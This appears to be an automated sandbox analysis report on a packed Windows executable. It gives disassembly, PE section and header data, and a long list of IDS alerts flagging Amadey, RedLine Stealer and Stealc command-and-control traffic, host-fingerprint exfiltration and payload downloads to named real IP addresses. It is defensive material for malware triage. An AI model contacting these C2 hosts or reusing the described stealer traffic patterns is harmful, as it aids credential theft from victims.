                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        pop es
                                                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        or ecx, dword ptr [edx]
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x388.rsrc
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x309df00x10sfctgzqb
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x309da00x18sfctgzqb
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                        0x10000x680000x6800063658e0d832a4a261ceb297144a82607False0.5632159893329327data7.111669260859514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .rsrc0x690000x3880x400514f5782f497fa171df6168314823de0False0.453125data5.340697973950139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        sfctgzqb0x6b0000x29f0000x29ee001239c2cb74d1e16cbbfafd3e935521bdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        qkipfcli0x30a0000x10000x400d8f5002ce3fa87537f56038d4074eb9fFalse0.7509765625data5.942885414437009IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .taggant0x30b0000x30000x2200068604b7924951fe0cc65747c3030e88False0.0625DOS executable (COM)0.7691195363365196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                        RT_MANIFEST0x690700x198ASCII text, with CRLF line terminators0.5808823529411765
                                                                                                                                                                                                                                                                                        RT_MANIFEST0x692080x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:06.778525+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.1049848185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:11.236305+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.104985831.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:14.896120+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.1049856TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:16.237759+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049868185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:17.714552+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.104987231.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:22.811575+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049884185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:24.265874+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.104989031.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:29.278884+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049904185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:30.727587+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.104991231.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:35.207517+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049926185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:36.675555+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.104993131.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:37.185345+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1049933185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:37.185345+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1049933185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:37.185345+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1049933185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:37.429929+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1049938185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:37.429929+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1049938185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:37.429929+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1049938185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:39.209260+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1049943185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:39.209260+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1049943185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:39.209260+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1049943185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:42.321382+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049946185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:44.289301+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049951185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:45.752757+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049957185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:51.420975+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049970185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:53.217233+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049975185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:55.965003+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049983185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:56.281784+01002001046ET MALWARE UPX compressed file download possible malware3185.81.68.14780192.168.2.1049983TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:57.323492+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:57.323492+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:57.758591+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.1049987TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:57.805054+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1049989185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:57.805054+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1049989185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:57.805054+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1049989185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:58.053827+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1049996185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:58.053827+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1049996185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:48:58.053827+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1049996185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.539654+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1049998185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.539654+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1049998185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.539654+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1049998185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.649649+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1049999185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.782649+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050008185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.782649+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050008185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:00.782649+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050008185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:01.392290+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050011185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:01.392290+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050011185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:01.392290+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050011185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:02.146006+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1050010185.215.113.1680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:02.860674+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:03.271064+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050017185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:03.271064+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050017185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:03.271064+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050017185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:03.298149+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.1049987TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:03.835156+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:04.588176+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:05.207591+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050021185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:05.207591+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050021185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:05.207591+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050021185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:05.941811+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:06.524367+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:07.098867+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:07.246330+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050030185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:07.246330+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050030185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:07.246330+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050030185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:07.724825+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.1050024185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:08.248085+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.1050024185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:08.701832+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.1050024TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:08.908525+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050034185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:08.908525+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050034185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:08.908525+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050034185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:09.021402+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.1050024185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:09.219283+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.1050024TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:09.311065+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:09.751202+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.283805+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.575372+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1050035185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.669752+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.1050024185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.703399+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050036185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.703399+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050036185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.703399+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050036185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:10.734934+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:11.728022+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.076552+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050024185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.109274+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.105003731.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.169561+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.607750+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.687511+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050038185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.687511+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050038185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:12.687511+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050038185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:13.048307+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:13.603022+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:13.758647+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:14.210076+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:14.392460+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050040185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:14.392460+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050040185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:14.392460+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050040185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:14.648312+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:14.712528+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.105003931.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:15.084665+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:15.555208+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:16.046870+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050041185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:16.046870+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050041185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:16.046870+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050041185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:16.095366+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:16.215903+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:17.575686+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:17.891832+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050043185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:17.891832+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050043185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:17.891832+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050043185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:18.012627+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:18.518179+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049987185.81.68.1471912TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:19.946252+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050045185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:19.946252+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050045185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:19.946252+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050045185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:22.019394+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050048185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:22.019394+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050048185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:22.019394+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050048185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:22.815800+01002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.1050047185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:23.947453+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050050185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:23.947453+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050050185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:23.947453+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050050185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:24.329585+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.105004931.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:25.845097+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050060185.81.68.14780TCP
